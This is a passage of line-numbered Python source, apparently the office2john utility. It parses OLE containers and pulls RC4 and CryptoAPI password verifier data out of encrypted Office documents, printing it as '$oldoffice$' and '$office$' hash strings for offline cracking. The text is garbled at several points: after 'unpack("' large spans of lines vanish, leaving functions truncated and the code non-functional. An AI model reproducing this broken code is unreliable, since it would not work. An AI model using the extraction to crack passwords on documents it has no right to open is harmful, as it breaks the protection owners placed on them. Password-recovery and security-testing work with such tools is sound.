_OleDirectoryEntry(entry, sid, self) 1246 | return self.direntries[sid] 1247 | 1248 | 1249 | def dumpdirectory(self): 1250 | """ 1251 | Dump directory (for debugging only) 1252 | """ 1253 | self.root.dump() 1254 | 1255 | 1256 | def _open(self, start, size = 0x7FFFFFFF, force_FAT=False): 1257 | """ 1258 | Open a stream, either in FAT or MiniFAT according to its size. 1259 | (openstream helper) 1260 | 1261 | start: index of first sector 1262 | size: size of stream (or nothing if size is unknown) 1263 | force_FAT: if False (default), stream will be opened in FAT or MiniFAT 1264 | according to size. If True, it will always be opened in FAT. 1265 | """ 1266 | debug('OleFileIO.open(): sect=%d, size=%d, force_FAT=%s' % 1267 | (start, size, str(force_FAT))) 1268 | # stream size is compared to the MiniSectorCutoff threshold: 1269 | if size < self.minisectorcutoff and not force_FAT: 1270 | # ministream object 1271 | if not self.ministream: 1272 | # load MiniFAT if it wasn't already done: 1273 | self.loadminifat() 1274 | # The first sector index of the miniFAT stream is stored in the 1275 | # root directory entry: 1276 | size_ministream = self.root.size 1277 | debug('Opening MiniStream: sect=%d, size=%d' % 1278 | (self.root.isectStart, size_ministream)) 1279 | self.ministream = self._open(self.root.isectStart, 1280 | size_ministream, force_FAT=True) 1281 | return _OleStream(self.ministream, start, size, 0, 1282 | self.minisectorsize, self.minifat, 1283 | self.ministream.size) 1284 | else: 1285 | # standard stream 1286 | return _OleStream(self.fp, start, size, 512, 1287 | self.sectorsize, self.fat, self._filesize) 1288 | 1289 | 1290 | def _list(self, files, prefix, node): 1291 | """ 1292 | (listdir helper) 1293 | files: list of files to fill in 1294 | prefix: current location in storage tree (list of names) 1295 | node: current node (_OleDirectoryEntry object) 1296 | """ 1297 | prefix = prefix + [node.name] 1298 | for entry in node.kids: 1299 | if entry.kids: 1300 | self._list(files, prefix, entry) 1301 | else: 1302 | files.append(prefix[1:] + [entry.name]) 1303 | 1304 | 1305 | def listdir(self): 1306 | """ 1307 | Return a list of streams stored in this file 1308 | """ 1309 | files = [] 1310 | self._list(files, [], self.root) 1311 | return files 1312 | 1313 | 1314 | def _find(self, filename): 1315 | """ 1316 | Returns directory entry of given filename. (openstream helper) 1317 | Note: this method is case-insensitive. 1318 | 1319 | filename: path of stream in storage tree (except root entry), either: 1320 | - a string using Unix path syntax, for example: 1321 | 'storage_1/storage_1.2/stream' 1322 | - a list of storage filenames, path to the desired stream/storage. 1323 | Example: ['storage_1', 'storage_1.2', 'stream'] 1324 | return: sid of requested filename 1325 | raise IOError if file not found 1326 | """ 1327 | 1328 | #filename = filename.decode() 1329 | # if filename is a string instead of a list, split it on slashes to 1330 | # convert to a list: 1331 | filename = filename.split('/') 1332 | # walk across storage tree, following given path: 1333 | node = self.root 1334 | for name in filename: 1335 | for kid in node.kids: 1336 | if kid.name.lower() == name.lower(): 1337 | break 1338 | else: 1339 | raise IOError("file not found") 1340 | node = kid 1341 | return node.sid 1342 | 1343 | 1344 | def openstream(self, filename): 1345 | """ 1346 | Open a stream as a read-only file object (StringIO). 1347 | 1348 | filename: path of stream in storage tree (except root entry), either: 1349 | - a string using Unix path syntax, for example: 1350 | 'storage_1/storage_1.2/stream' 1351 | - a list of storage filenames, path to the desired stream/storage. 1352 | Example: ['storage_1', 'storage_1.2', 'stream'] 1353 | return: file object (read-only) 1354 | raise IOError if filename not found, or if this is not a stream. 1355 | """ 1356 | sid = self._find(filename) 1357 | entry = self.direntries[sid] 1358 | if entry.entry_type != STGTY_STREAM: 1359 | raise IOError("this file is not a stream") 1360 | return self._open(entry.isectStart, entry.size) 1361 | 1362 | 1363 | def get_type(self, filename): 1364 | """ 1365 | Test if given filename exists as a stream or a storage in the OLE 1366 | container, and return its type. 1367 | 1368 | filename: path of stream in storage tree. (see openstream for syntax) 1369 | return: False if object does not exist, its entry type (>0) otherwise: 1370 | - STGTY_STREAM: a stream 1371 | - STGTY_STORAGE: a storage 1372 | - STGTY_ROOT: the root entry 1373 | """ 1374 | try: 1375 | sid = self._find(filename) 1376 | entry = self.direntries[sid] 1377 | return entry.entry_type 1378 | except: 1379 | return False 1380 | 1381 | 1382 | def exists(self, filename): 1383 | """ 1384 | Test if given filename exists as a stream or a storage in the OLE 1385 | container. 1386 | 1387 | filename: path of stream in storage tree. (see openstream for syntax) 1388 | return: True if object exist, else False. 1389 | """ 1390 | try: 1391 | sid = self._find(filename) 1392 | return True 1393 | except: 1394 | return False 1395 | 1396 | 1397 | def get_size(self, filename): 1398 | """ 1399 | Return size of a stream in the OLE container, in bytes. 1400 | 1401 | filename: path of stream in storage tree (see openstream for syntax) 1402 | return: size in bytes (long integer) 1403 | raise: IOError if file not found, TypeError if this is not a stream. 1404 | """ 1405 | sid = self._find(filename) 1406 | entry = self.direntries[sid] 1407 | if entry.entry_type != STGTY_STREAM: 1408 | #TODO: Should it return zero instead of raising an exception ? 1409 | raise TypeError('object is not an OLE stream') 1410 | return entry.size 1411 | 1412 | 1413 | def get_rootentry_name(self): 1414 | """ 1415 | Return root entry name. Should usually be 'Root Entry' or 'R' in most 1416 | implementations. 1417 | """ 1418 | return self.root.name 1419 | 1420 | 1421 | def getproperties(self, filename): 1422 | """ 1423 | Return properties described in substream. 1424 | 1425 | filename: path of stream in storage tree (see openstream for syntax) 1426 | return: a dictionary of values indexed by id (integer) 1427 | """ 1428 | fp = self.openstream(filename) 1429 | 1430 | data = {} 1431 | 1432 | # header 1433 | s = fp.read(28) 1434 | # clsid = _clsid(s[8:24]) 1435 | 1436 | # format id 1437 | s = fp.read(20) 1438 | # fmtid = _clsid(s[:16]) 1439 | fp.seek(i32(s, 16)) 1440 | 1441 | # get section 1442 | s = b"****" + fp.read(i32(fp.read(4))-4) 1443 | 1444 | for i in range(i32(s, 4)): 1445 | 1446 | id = i32(s, 8+i*8) 1447 | offset = i32(s, 12+i*8) 1448 | type = i32(s, offset) 1449 | 1450 | debug ('property id=%d: type=%d offset=%X' % (id, type, offset)) 1451 | 1452 | # test for common types first (should perhaps use 1453 | # a dictionary instead?) 1454 | 1455 | if type == VT_I2: 1456 | value = i16(s, offset+4) 1457 | if value >= 32768: 1458 | value = value - 65536 1459 | elif type == VT_UI2: 1460 | value = i16(s, offset+4) 1461 | elif type in (VT_I4, VT_ERROR): 1462 | value = i32(s, offset+4) 1463 | elif type == VT_UI4: 1464 | value = i32(s, offset+4) # FIXME 1465 | elif type in (VT_BSTR, VT_LPSTR): 1466 | count = i32(s, offset+4) 1467 | value = s[offset+8:offset+8+count-1] 1468 | elif type == VT_BLOB: 1469 | count = i32(s, offset+4) 1470 | value = s[offset+8:offset+8+count] 1471 | elif type == VT_LPWSTR: 1472 | count = i32(s, offset+4) 1473 | value = _unicode(s[offset+8:offset+8+count*2]) 1474 | elif type == VT_FILETIME: 1475 | value = i32(s, offset+4) + ((i32(s, offset+8))<<32) 1476 | # FIXME: this is a 64-bit int: "number of 100ns periods 1477 | # since Jan 1,1601". Should map this to Python time 1478 | value = value / 10000000 # seconds 1479 | elif type == VT_UI1: 1480 | value = ord(s[offset+4]) 1481 | elif type == VT_CLSID: 1482 | value = _clsid(s[offset+4:offset+20]) 1483 | elif type == VT_CF: 1484 | count = i32(s, offset+4) 1485 | value = s[offset+8:offset+8+count] 1486 | else: 1487 | value = None # everything else yields "None" 1488 | 1489 | data[id] = value 1490 | 1491 | return data 1492 | 1493 | 1494 | # library ends, program starts 1495 | # Author: Worawit (sleepya), http://auntitled.blogspot.in 1496 | # http://msdn.microsoft.com/en-us/library/dd908560%28v=office.12%29 1497 | # http://msdn.microsoft.com/en-us/library/dd920360%28v=office.12%29 1498 | 1499 | from struct import unpack 1500 | import binascii 1501 | 1502 | def find_rc4_passinfo_xls(filename, stream): 1503 | while True: 1504 | pos = stream.tell() 1505 | if pos >= stream.size: 1506 | break # eof 1507 | 1508 | type = unpack("= 2 and minor_version == 2: 1615 | # RC4 CryptoAPI Encryption Header 1616 | unpack("= 2 and minor_version == 2: 1712 | # RC4 CryptoAPI Encryption Header 1713 | unpack(" -1: 1797 | sys.stderr.write("%s uses un-supported cipher algorithm %s, please file a bug! \n" \ 1798 | % (filename, cipherAlgorithm)) 1799 | return -4 1800 | 1801 | saltValue = node.attrib.get("saltValue") 1802 | assert(saltValue) 1803 | encryptedVerifierHashInput = node.attrib.get("encryptedVerifierHashInput") 1804 | encryptedVerifierHashValue = node.attrib.get("encryptedVerifierHashValue") 1805 | encryptedVerifierHashValue = binascii.hexlify(base64.decodestring(encryptedVerifierHashValue.encode())) 1806 | 1807 | sys.stdout.write("$office$*%d*%d*%d*%d*%s*%s*%s\n" % \ 1808 | ( version, 1809 | int(spinCount), int(keyBits), int(saltSize), 1810 | binascii.hexlify(base64.decodestring(saltValue.encode())).decode("ascii"), 1811 | binascii.hexlify(base64.decodestring(encryptedVerifierHashInput.encode())).decode("ascii"), 1812 | encryptedVerifierHashValue[0:64].decode("ascii"))) 1813 | return 0 1814 | else: 1815 | # Office 2007 file detected, process CryptoAPI Encryption Header 1816 | stm = stream 1817 | headerLength = unpack("', re.DOTALL) 1860 | return p.sub('', data) 1861 | 1862 | 1863 | def remove_extra_spaces(data): 1864 | p = re.compile(r'\s+') 1865 | return p.sub(' ', data) 1866 | 1867 | 1868 | def process_file(filename): 1869 | 1870 | # Test if a file is an OLE container: 1871 | try: 1872 | f = open(filename, "rb") 1873 | if f.read(2) == b"PK": 1874 | sys.stderr.write("%s : zip container found, file is " \ 1875 | "unencrypted?, invalid OLE file!\n" % filename) 1876 | f.close() 1877 | return 1 1878 | f.close() 1879 | 1880 | if not isOleFile(filename): 1881 | sys.stderr.write("%s : Invalid OLE file\n" % filename) 1882 | return 1 1883 | except Exception: 1884 | e = sys.exc_info()[1] 1885 | import traceback 1886 | traceback.print_exc() 1887 | sys.stderr.write("%s : OLE check failed, %s\n" % (filename, str(e))) 1888 | return 2 1889 | 1890 | # Open OLE file: 1891 | ole = OleFileIO(filename) 1892 | 1893 | stream = None 1894 | 1895 | # find "summary" streams 1896 | global have_summary, summary 1897 | have_summary = False 1898 | summary = [] 1899 | 1900 | for streamname in ole.listdir(): 1901 | streamname = streamname[-1] 1902 | if streamname[0] == "\005": 1903 | have_summary = True 1904 | props = ole.getproperties(streamname) 1905 | props = props.items() 1906 | for k, v in props: 1907 | if v is None: 1908 | continue 1909 | binary = False 1910 | if isinstance(v, bytes): 1911 | try: 1912 | v = v.decode() 1913 | except: 1914 | import traceback 1915 | traceback.print_exc() 1916 | if PY3: 1917 | check = isinstance(v, str) 1918 | else: 1919 | check = isinstance(v, str) or isinstance(v, unicode) 1920 | if check: 1921 | v = remove_html_tags(v) 1922 | v = v.replace(":", "") 1923 | v = remove_extra_spaces(v) 1924 | # binary filter 1925 | o = "" 1926 | for c in v: 1927 | if c in string.printable: 1928 | o = o + c 1929 | v = o 1930 | # v = filter(lambda x: x in string.printable, v) 1931 | # length filter 1932 | words = str(v).split() 1933 | words = filter(lambda x: len(x) < 20, words) 1934 | v = " ".join(words) 1935 | #[PL]: avoid to display too large or binary values: 1936 | #if len(v) > 50: 1937 | # v = v[:50] 1938 | # quick and dirty binary check: 1939 | for c in (1, 2, 3, 4, 5, 6, 7, 11, 12, 14, 15, 16, 17, 18, 19, 20, 1940 | 21, 22, 23, 24, 25, 26, 27, 28, 29, 30, 31): 1941 | if chr(c) in v: 1942 | v = '(binary data)' 1943 | binary = True 1944 | break 1945 | if not binary: 1946 | summary.append(str(v)) 1947 | summary = " ".join(summary) 1948 | summary = remove_extra_spaces(summary) 1949 | 1950 | if ["EncryptionInfo"] in ole.listdir(): 1951 | # process Office 2003 / 2010 / 2013 files 1952 | return process_new_office(filename) 1953 | if ["Workbook"] in ole.listdir(): 1954 | stream = "Workbook" 1955 | elif ["WordDocument"] in ole.listdir(): 1956 | stream = "1Table" 1957 | elif ["PowerPoint Document"] in ole.listdir(): 1958 | stream = "Current User" 1959 | else: 1960 | sys.stderr.write("%s : No supported streams found\n" % filename) 1961 | return 2 1962 | 1963 | try: 1964 | workbookStream = ole.openstream(stream) 1965 | except: 1966 | import traceback 1967 | traceback.print_exc() 1968 | sys.stderr.write("%s : stream %s not found!\n" % (filename, stream)) 1969 | return 2 1970 | 1971 | if workbookStream is None: 1972 | sys.stderr.write("%s : Error opening stream, %s\n" % filename) 1973 | (filename, stream) 1974 | return 3 1975 | 1976 | if stream == "Workbook": 1977 | typ = 0 1978 | passinfo = find_rc4_passinfo_xls(filename, workbookStream) 1979 | if passinfo is None: 1980 | return 4 1981 | elif stream == "1Table": 1982 | typ = 1 1983 | sdoc = ole.openstream("WordDocument") 1984 | ret = find_doc_type(filename, sdoc) 1985 | if not ret: 1986 | passinfo = find_rc4_passinfo_doc(filename, workbookStream) 1987 | if passinfo is None: 1988 | return 4 1989 | else: 1990 | return 5 1991 | else: 1992 | sppt = ole.openstream("Current User") 1993 | offset = find_ppt_type(filename, sppt) 1994 | sppt = ole.openstream("PowerPoint Document") 1995 | find_rc4_passinfo_ppt(filename, sppt, offset) 1996 | return 6 1997 | 1998 | (salt, verifier, verifierHash) = passinfo 1999 | if not have_summary: 2000 | sys.stdout.write("$oldoffice$%s*%s*%s*%s\n" % ( 2001 | typ, binascii.hexlify(salt).decode("ascii"), 2002 | binascii.hexlify(verifier).decode("ascii"), 2003 | binascii.hexlify(verifierHash).decode("ascii"))) 2004 | else: 2005 | sys.stdout.write("$oldoffice$%s*%s*%s*%s\n" % ( 2006 | typ, binascii.hexlify(salt).decode("ascii"), 2007 | binascii.hexlify(verifier).decode("ascii"), 2008 | binascii.hexlify(verifierHash).decode("ascii"))) 2009 | 2010 | workbookStream.close() 2011 | ole.close() 2012 | 2013 | return 0 2014 | 2015 | if __name__ == "__main__": 2016 | if len(sys.argv) < 2: 2017 | sys.stderr.write("Usage: %s \n" % sys.argv[0]) 2018 | sys.exit(1) 2019 | 2020 | for i in range(1, len(sys.argv)): 2021 | ret = process_file(sys.argv[i]) 2022 | --------------------------------------------------------------------------------